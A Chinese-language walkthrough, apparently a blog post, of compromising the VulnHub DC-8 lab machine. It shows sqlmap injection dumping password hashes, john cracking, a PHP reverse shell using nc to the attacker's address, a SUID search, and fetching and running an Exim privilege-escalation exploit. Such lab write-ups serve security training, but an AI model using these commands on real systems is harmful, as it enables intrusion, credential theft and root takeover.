一、环境搭建
DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip
kali:192.168.144.148
DC-8:192.168.144.156
二、渗透流程
nmap -T5 -A -p- -sV -sT 192.168.144.156
![](https://i-blog.csdnimg.cn/blog_migrate/2978e9bb88bdca864049cb8a955d5dc5.png)
思路:
1、80端口目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……2、22端口
ssh爆破、有账号密码信息进行远程登录
……
1.插入'
报错,尝试进行sql注入
2.爆数据库:
sqlmap -u "http://192.168.144.156/?nid=1" --dbs
3.爆d7db
数据库的表:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db --tables
4.爆users
表的列:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' --columns
5,爆users表的字段:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump
![](https://i-blog.csdnimg.cn/blog_migrate/236a9a1b5a107936f58880bba95c268c.png)
6.将这两个密码保存,使用john进行爆破:获取到账号密码 john:turtle
![](https://i-blog.csdnimg.cn/blog_migrate/c22bd40269a1846c592b87ec3726173b.png)
登录后台地址:
http://192.168.144.156/user/login
1.php反弹shell代码
<?php system("nc -e /bin/sh 192.168.144.148 4444");?>
![](https://i-blog.csdnimg.cn/blog_migrate/b338ad677b99123782375fc8b74a1b41.png)
![](https://i-blog.csdnimg.cn/blog_migrate/64b97a0f3a98bd4b92e4b25fa8f09053.png)
![](https://i-blog.csdnimg.cn/blog_migrate/dbd28e9ca4a253a04df31d38c92c9410.png)
2.利用python切换到bash环境
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://i-blog.csdnimg.cn/blog_migrate/e3250d92e31b7b002a55cfb696f84b0e.png)
1.利用find命令查找具有suid的root的文件
find / -perm -4000 -user root 2>/dev/null
![](https://i-blog.csdnimg.cn/blog_migrate/c48d041845030a65f7e302dbe464de50.png)
2.查看exim具体版本
dpkg -l | grep exim
![](https://i-blog.csdnimg.cn/blog_migrate/52780e182b970657377c088cc437ae34.png)
3.搜索exim 4.89的具体漏洞
searchsploit exim
![](https://i-blog.csdnimg.cn/blog_migrate/6c426942292dfc3f544a600e6c6dfb9a.png)
4.漏洞利用
拷贝46996.sh到桌面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
在46996.sh内容中添加:set ff=unix
,否则会报如下错误:
![](https://i-blog.csdnimg.cn/blog_migrate/594c7465271ef8335072a0e79f281af0.png)
![](https://i-blog.csdnimg.cn/blog_migrate/2b053533c0d979508b0e40588eae793a.png)
kali 开启临时HTTP服务器
python -m SimpleHTTPServer
![](https://i-blog.csdnimg.cn/blog_migrate/510ce9707279a3476aa27700783e1ce9.png)
下载shell到/tmp临时文件目录
#下载kali主机46996.sh文件至靶机shell的/tmp目录下
wget http://192.168.144.148:8000/46996.sh
#并赋予权限
chmod 777 46996.sh
![](https://i-blog.csdnimg.cn/blog_migrate/a8d76f1d9b0a2dab1adfd06df5aeb58d.png)
./46996.sh -m netcat
三、思路总结
1、信息收集
2、利用SQL注入获取账号密码
3、登陆后台
4、插入脚本反弹shell
5、exim漏洞
6、SUID提权